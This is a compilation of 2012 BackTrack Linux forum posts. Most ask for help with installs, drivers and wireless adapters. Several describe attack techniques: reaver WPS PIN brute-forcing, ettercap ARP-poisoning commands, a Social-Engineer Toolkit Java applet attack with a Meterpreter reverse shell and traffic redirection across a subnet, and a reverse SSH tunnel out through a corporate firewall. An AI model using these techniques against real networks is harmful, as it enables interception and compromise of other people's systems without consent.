I noticed that reaver starts trying pings starting from 00XX XXXX, the last six digits change somehow randomly but the first two increase in order. So if the pin we're looking for starts with 8 or 9 it would take forever to find it..
To make it try all digits randomly would require modifying the program's source code but I was thinking that maybe it could be possible to alter the session file to make reaver start from 50XX XXXX or any given number, and if it reaches the end without finding it then one could start from the beginning.
So.. tell me if you think this could be possible..
Thanks in advance.
-
-
HI Guys I recently installed bactrack and when I was doing an airodump-ng to scan networks nothing comes up, in my phone there is like 5 APs, there has to be something wrong with the driver or somwthing, how can I install it
I type
airmon-ng start wlan0
Found 4 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to kill (some of) them!
PID Name
662 NetworkManager
837 wpa_supplicant
1266 dhclient3
1645 dhclient3
Process with PID 1645 (dhclient3) is running on interface wlan0
Process with PID 2003 (airodump-ng) is running on interface mon0
Process with PID 2011 (airodump-ng) is running on interface mon0
Interface Chipset Driver
wlan0 Unknown rt2800pci - [phy0]
(monitor mode enabled on mon1)
mon0 Unknown rt2800pci - [phy0]
Then
airodump-ng mon0
CH 8 ][ Elapsed: 4 s ][ 2012-11-29 06:27
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
BSSID STATION PWR Rate Lost Packets Probes
Nothing comes up. Can you help, I am a newbie at drivers in linux, how can I fix this? THansk
-
Hi guys, I'm current installing Backtrack r3 by using virtual box.
The problem is I stuck in the middle part of installation, which the partition size of my device (8gb) is not enough for (11.3gb) installation.
Is there any way to increase the partition size? or this is the limit of my device?
Thanks.
Screenshot - 29_11_2012 , 3_49_41 PM.jpgScreenshot - 29_11_2012 , 3_50_14 PM.jpg
Immagini allegate
-
I was curious if it is be possible to dual boot Windows 8 and Backtrack5r3 on Lenovo ideapad yoga?
I have read about this new intel security feature(UEFI (Unified Extensible Firmware Interface)) that might not allow this.?
my second question would be if it is possible to configure a dual boot is there a way to install backtrack5r3 to a SDXC card and then be able to boot from it.
I also read that the new Lenovos are compatible with SDXC.
any info would be greatly appreciated!
Below are my system specs.
system info.jpg
any info would be greatly appreciated!
Immagini allegate
-
When I boot up from the USB stick I get the main page and when I select the any of the menu items it starts goes through the screen and then hangs. I have an IBM T410s laptop.
Is there a way I can get this to work?
-
Hi,
I've installed Backtrack 5r3 onto a VM and I'm trying to get NoMachine NX setup for remote administration however I'm having a lot of trouble!
SSH is setup and working however I can't get NX to connect. The main issue I'm having is around the user authentication, as far as I can tell I can't use the root account to login via NX. Some sites advise that configuring the server.cfg file should allow me to login as root however this didnt work.
I created a new user account, non-root, and confirmed this was in the NX users db however I'm still getting authentication failures.
Does anyone have a guide/tutorial on how to setup NX on Backtrack 5 or could anyone help me out, it is my first post ;)
Thanks
DsQ
-
Hi.
I installed backtrack 5 r3 32 gnome iso to my usb flash drive on my laptop (which is 32 bit system with win7 os) with the unetbootin exe. I went into bios and changed the boot settings to boot from usb. When it restarts it takes me to the unetbootin screen where it has the options (default/backtrack text/ backtrack no drm etc). I choose default and it just restarts and takes me back to the unetbootin screen.
I never had this problem with back track 3. Backtrack 3 just loads up fine. What am I doing wrong?
-
Hi all,
So I have an issue, in which I setup a reverse ssh connection on a virtual backtrack instance, which connects to a relay server of mine. As a result of this I can ssh into my relay server and then ssh into the virtual backtrack instance and have shell access...keep in mind this is working all over port 80 from the virtual machine side to the relay server with a public ip...logically it looks like this :
[VIRTUAL BACKTRACK INSTANCE WITH PRIVATE IP]------[CORP FIREWALL]-----(INTERNET)-----[RELAY SERVER WITH PUBLIC IP ]
My issues is...I need a way to leverage this reverse ssh connection and perform a remote desktop over port 80 .....or make another reverse ssh connection over port 80 with a remote desktop application...I mainly need this because I need to run tools like nessus and need to access the GUI of virtual backtrack instance so that I can use the browser to run nessus....any suggestions would be greatly appreciated!!! Please help!
-
Okay so i've tried searching for this problem. but basically what happens is that when i try to boot backtrack off my USB to install it, as soon as it starts loading with all the text scrolling up my screen gets all messed up and i can't view my screen (this is just as it is loading i don't even get to type "startx" before it messes up)! but i know that its still running in the background. had the same problem with ubuntu btw but because ubuntu has a fallback mode i was able to install the proprietary drivers and then i was able to boot it normally. but i don't see that fallback mode option here! how do i fix?!?
Thanks in advance for the kind and prompt response!
-
What is the preferred way to create an image/clone of the install on my Linux Box?
I essentially want to have a live Backup with option to install from the DVD, of the BackTrack 5 Install once it is complete and setup with drivers etc.
-
Hi, i want to buy a awus036h wifi adapter. I have read some reviews saying that the problem of this adapter is that you cant connect to n networks becouse awus036h is only b/g. I know this is not true (am i wrong?) becouse 802.11n should be backward compatible with b/g but this lead me to another doubt. I can connect to n networks (even if with lower rates) but can i inject packets (ie send a deauth packet) to a station that is connected to an n-AP using the n protocol?
If this cant be done maybe i should buy the awus036nh even if reviews (and posts on this forum) about this adapter are not so good.
Thanks
-
Hello everybody,
I just got my new Asus ROG G55VW-S1025D and installed BackTrack 5 R3 x64 as the only OS (I will use the laptop mainly for pen-testing and other sysadmin stuff) ... The laptop specs are as follows :
Code:
G55VW-S1025D
Display: 15.6" 1920x1080 60Hz Matte
Intel Core i7-3610QM (2.30GHz, 1600MHz, 6MB),
Video nVidia GeForce GTX660M 2GB GDDR5,
RAM 8GB DDR3 1600MHz (2x4GB, 2 sloturi libere),
HDD 750GB 7.200rpm, SuperMulti DL DVD+/-RW,
Card Reader 3-1 (SD/MMC/MS),
Speakers Sonic Master, HD webcam,
LAN 10/100/1000,
WLAN b/g/n,
no Modem,
Bluetooth 4.0,
no Finger Print Reader,
Ports: 4xUSB3.0/1xHDMI/1xRJ45/1xVGA/1xMic/1xHeadphone/1xmini Display Port
From the ground up there are some issues that I encountered (Remember ...this is a clean install with the updates available on 27.11.2012):
*** Everything will be done as root or you can add "sudo" in front of every command line except the commented ones (between /*...*/)***
1. Update Backtrack
Code:
/* Update Backtrack*/
apt-get update
apt-get upgrade
apt-get dist-upgrade
2. nVidia Driver Instalation ():
The first thing you have to to is to logout or close the Xorg server and then:
Code:
wget uk.download.nvidia.com/XFree86/Linux-x86_64/310.19/NVIDIA-Linux-x86_64-310.19.run /* Download the nVidia GTX660M driver(or go to the nVidia website and download the driver you need or a newer version of the driver)*/
chmod +X NVIDIA-Linux-x86_64-310.19.run /* Make the installation file executable*/
./NVIDIA-Linux-x86_64-310.19.run /* Start the installation*/
And just follow the instructions on screen to finish the installation...then just reboot and everything will work !
3. Wireless NIC (Network Internet Controller)
As you probably already noticed you can't find anywhere (in the online specs) the model/version/producer of the wireless controller and at the first boot after installation if you run "ifconfig" or "iwconfig" you wont find any wireless adapter! Only in "lspci" it is shown as "Network controller: Intel Corporation Device 0887 (rev c4)" !! To work around this issue you have to do as follows:
Code:
wget http://distfiles.exherbo.org/distfiles/iwlwifi-2030-ucode-18.168.6.1.tgz /* Download iwlwifi-2030-ucode-18.168.6.1.tgz */
tar xvf iwlwifi-2030-ucode-18.168.6.1.tgz /* Extract the files from the archive */
cd iwlwifi-2030-ucode-18.168.6.1 /* Go to the folder */
mv * /lib/firmware/ /* Move all the files into /lib/firmware */
reboot
After the Reboot open a console and run "ifconfig" or "iwconfig" and your Wireless NIC should appear on the list (notice the wlan0 ? that is my network controller wifi interface )
Sample Output :
Code:
wlan0 Link encap:Ethernet HWaddr xx:xx:xx:xx:xx:xx
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:0 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:0 (0.0 B)
Next you will have to open Wicd Network Manager (default in Backtrack) go to Preferences and at the Wireless Interface ad "wlan0" (or what other interface you have) !! Reboot and now your wifi should work !!
Now ... the Aircrack tools "work" after this but at first glance:
- there is no channel hopping ... the channel is fixed on channel 1 even if you specify --cswitch (I will have to investigate further but i don`t have the time now)
- didn't test to see if injection and everything else works But I will asap !
4. Illuminated Keyboard Doesn't work ... but i`m working on it ! (tried the asus-keyboard-backlight_0.1_src script but didn't work)
I`ll get back on this thread asap and as i discover other problems/solutions I will post them here !
Any questions are welcome and please don`t be a troll !!
-
-
Hi there,
I'm having some problems with ettercap and port stealing.
I want to monitor my home network this way. to get a good impression what my kids are doing on the internet.
I'm running BT5
IP forwarding is enabled
When i ran Ettercap -T -Q -P autoadd -M arp //gateway // its all working fine it get
But when i run Ettercap -T -Q -P autoadd -M port //gateway // nothing is happening.
I'm seeing that its scanning for hosts and find some.
It enables the pluggin autoadd
starting port stealing...
after this it stops
The box i'm using doens't have iptables enabled
Both the GUI id are set to 0
What am i doing wrong???
Can somebody help me correct it?
-
i was trying to upgrade from r2 to r3, and that's what i've got:
Code:
Reading package lists... Done
Building dependency tree
Reading state information... Done
Package jigsaw is not available, but is referred to by another package.
This may mean that the package is missing, has been obsoleted, or
is only available from another source
E: Unable to locate package libcrafter
E: Unable to locate package blueranger
E: Unable to locate package dbd
E: Unable to locate package inundator
E: Unable to locate package intersect
E: Unable to locate package mercury
E: Unable to locate package trixd00r
E: Unable to locate package netgear-telnetenable
E: Unable to locate package jboss-autopwn
E: Unable to locate package deblaze
E: Unable to locate package sakis3g
E: Unable to locate package voiphoney
E: Unable to locate package apache-users
E: Unable to locate package phrasendrescher
E: Unable to locate package kautilya
E: Unable to locate package manglefizz
E: Unable to locate package rainbowcrack
E: Unable to locate package rainbowcrack-mt
E: Unable to locate package lynis-audit
E: Unable to locate package spooftooph
E: Unable to locate package wifihoney
E: Unable to locate package twofi
E: Unable to locate package truecrack
E: Unable to locate package acccheck
E: Unable to locate package statsprocessor
E: Unable to locate package iphoneanalyzer
E: Unable to locate package jad
E: Unable to locate package javasnoop
E: Unable to locate package mitmproxy
E: Unable to locate package ewizard
E: Unable to locate package multimac
E: Unable to locate package smbexec
E: Unable to locate package websploit
E: Unable to locate package dnmap
E: Unable to locate package johnny
E: Unable to locate package unix-privesc-check
E: Unable to locate package sslcaudit
E: Unable to locate package dhcpig
E: Unable to locate package intercepter-ng
E: Unable to locate package u3-pwn
E: Unable to locate package binwalk
E: Unable to locate package laudanum
E: Unable to locate package wifite
E: Unable to locate package tnscmd10g
E: Unable to locate package bluepot
E: Unable to locate package dotdotpwn
E: Unable to locate package subterfuge
E: Package 'jigsaw' has no installation candidate
E: Unable to locate package urlcrazy
E: Unable to locate package creddump
E: Unable to locate package android-sdk
E: Unable to locate package apktool
E: Unable to locate package ded
E: Unable to locate package dex2jar
E: Unable to locate package droidbox
E: Unable to locate package smali
E: Unable to locate package termineter
E: Unable to locate package multiforcer
E: Unable to locate package bbqsql
E: Unable to locate package htexploit
E: Unable to locate package smartphone-pentest-framework
E: Unable to locate package fern-wifi-cracker
E: Unable to locate package powersploit
E: Unable to locate package webhandler
-
I don't know where to say this but you guys are awesome. bt5r3 is just what I need. I'm a network admin and I have to run Windows at work, but it now runs under a vm on Ubuntu. I will be moving to bt5 as soon as I can (stability of my workstation is paramount so changes are always concerning). bt5r3 is already on my home machine and my work laptop.
Anyway, just wanted to say thanks for a great OS and for not forcing Gnome3 and Unity on us. Please don't follow that Ubuntu path.
-
Hello all, I'm "new" at the forum because i usually don't ask, i read and search. Anyway, I'm still learning a lot about tools and how/when to use them - there're a LOT of them!
Some questions keep going on my mind and i haven't found a post that discuss exactly what I'm looking for and, maybe, it will help others with the same questions:
About Aircrack on WPA:
I have read a lot of way cracking wireless and i found two ways for WPA/WPA2: Bruteforce and Evil twin.
1-Is there any other effective way of cracking WPA?
2-How effective is bruteforcing with a Dictionary attack? I know there are programs to reduce and "fit" to a specif model your wordlist, but i think it is still so inefficient. For example, my wireless in a 8 numbers passaword length and i tried bruteforcing. Reducing my dictionary to a only 8 digits numbers would take, in average, 6 days to crack my password. Is this the idea? To let the computer running for days until it finds the correct match? I know i could batch the wordlist, etc, but it still ends at the leave-the-computer idea.
About MetaSploit:
1-All videos I've seen they can only exploit the computer when it has the AV down. So, I thought, at real, how effective is this exploit?
2-Is the bypass a A.V. and a Firewall the most hard difficulty when hacking into computers?
3-A lot of videos use some kind of social engineering to get the archive to the victims computer or it makes the person tell what he want. So what i conclude of this is that it is almost impossible to hack into someone's computer if you don't get any "help" from the victim. Am i right?
The Objective of this thread is to instinctive the discussion, the reflection about how the entire hacking process work.
Hope to get some useful answers and interesting points of view.
It is all for now,
Cantu.
-
Hi there,
I have Backtrack 5 RC3 installed encrypted persistent on a 32GB Micro USB. I have chosen to not use swap partitioning due to some advice from users here and from a friend who said it 'could' shorten the life of the USB device. I was wondering if it's possible to use the swap partition of the HDD in my laptop (running Fedora17) while it is running and whether or not I can have it search for the partition on boot in case I plug the USB into another machine that doesn't have a swap partition present?
Also could anyone tell me the command entry I would need to do to achieve this if it's possible.
Kind regards, Dan
-
Hello all. I am new to all things linux. I have been using Windows for a while and have grown completely bored. I am a High School senior with a big interest in computers. I never tried linux before, but heard good things about it. I am here because, I would like to know the general/important do's and dont's when it comes to switching to a linux OS. Also, You guys could give me some advice/suggestions for which things I need to know before making the switch. I am not new to the whole programming/hacking area, I just never had the means to invest until now. But I have no background knowledge of any linux systems or tools, so if anyone is willing to help, that would be greatly appreciated.
Thanks in advance,
Chris
-
Hi all,
I've spent ages looking around for a USB dual band WiFi card to work with BT5 r3. I've searched the forums, spoken to Alfa etc but haven't got a definite answer.
Can anyone suggest a dual band (2.4 and 5ghz) wifi USB card, having spent ages trawling google and other forums etc i would be seriously grateful. I'm not too fussed about having a big antenna etc but anything will do so long as it can perform the usual tasks such as injection etc.
Thanks in advance
-
I am relatively new to Linux and have been trying to use Backtrack 5 (until few days ago I used Ubuntu 12.10). BT5 doesn't detect my wireless card so I cant connect to any wireless networks, I am using a Broadcom Corporation BCM4313 802.11b/g/n Wireless LAN Controller (rev 01) wireless card. And I am using a netbbok Acer AspireOne. I was wondering is there anything I can do like download drivers/patches etc. to make my internal wireless card work, or will I have to buy an external USB wifi adapter. Also I am booting via USB.
Thank you very much for your collaboration.
-
So I am attempting to redirect all traffic on my wireless network to my SET java applet attack site.
I first went into my set_config (/pentest/exploits/set/config) and set ETTERCAP=ON and ETTERCAP_INTERFACE=wlan0
I booted up SET and chose
1) Social-engineering Attacks
2) Website Attack Vectors
1) Java Applet Attack Method
1) Web Templates
It asks me if I am NAT/Port forwarding, I say: no
I place my subnet ip 192.168.0.8
3) Google
It tells me that ARP Cache Poisoning is set to ON and asks what site i want to redirect to me I say:
http://www.google.com
2) windows meterpreter reverse_tcp
16) Backdoor Executable
Port 443 (also tried 4444, should not matter I do not think)
And so it goes through its process until it boots up metasploit and sets up the listener. At this point I can only get the java cert to pop up if i go to "192.168.0.8" directly. Otherwise google just takes me to the real google. Also if instead of specifying google I have also tried the "*" flag so that it redirects everything. When I do this no pages load except for if I specifically dial in 192.168.0.8. So not sure what is keeping this thing from redirecting.
My wireless card is Atheros AR2425, Driver ath5k
I have turned off Kaspersky and my firewall for this attack.
I am on Backtrack 5 r3 gnome. I did an apt-get update and apt-get dist-upgrade, plus msfupdate and svn updates for SET and ETTERCAP.
If anyone knows maybe a better way to do this? I simply want to use the set java applet attack and redirect everything on my subnet to my SET server ip at 192.168.0.8
Thank you very much for your help and I am hoping I am posting this correct!
-
Hi just wondering (noob here) how to open more shells/terminals in backtrack 5 running on vmware player. is there a command? like ctrl+t
or something..the videos i have watched the user seems to just click an icon in vmware player but i dont have that icon?
thanks
-
-
Ok im new to backtrack and i fully installed it on my box not knowing it would of taken away my windows , so it looks like i got to get to use to all the commands and such , i still have failed to get firefox with flashplayer and i also tried to get msn using sudo apt-get install emesene , i do not know where it went but it says "emesene is already the newest version" any help would be great full , im using backtrack 5 r3 , i have been reading all the forums trying to add everything to this but its so much different than windows , ive even looked at
http://atokbalthasar.wordpress.com/2...l-backtrack-5/ , any advice , tips , anything would be awesome , thanks
-
Hi All,
After doing apt-get dist-upgrade and upgrade my OpenVAS stopped working.
I tried updating, removing reinstalling with no lock.
My openvas-scanner is refusing to install and getting this error
apt-get install openvas-scanner
Reading package lists... Done
Building dependency tree
Reading state information... Done
Some packages could not be installed. This may mean that you have
requested an impossible situation or if you are using the unstable
distribution that some required packages have not yet been created
or been moved out of Incoming.
The following information may help to resolve the situation:
The following packages have unmet dependencies:
openvas-scanner: Depends: libc6 (>= 2.15) but 2.11.1-0ubuntu7.10 is to be installed
Depends: libgcrypt11 (>= 1.4.5) but 1.4.4-5ubuntu2.1 is to be installed
Depends: libgnutls26 (>= 2.12.6.1-0) but 2.8.5-2ubuntu0.1 is to be installed
Depends: libopenvas5 (>= 5.0.3) but it is not going to be installed
E: Broken packages
Your help is highly appreciated.
Regards,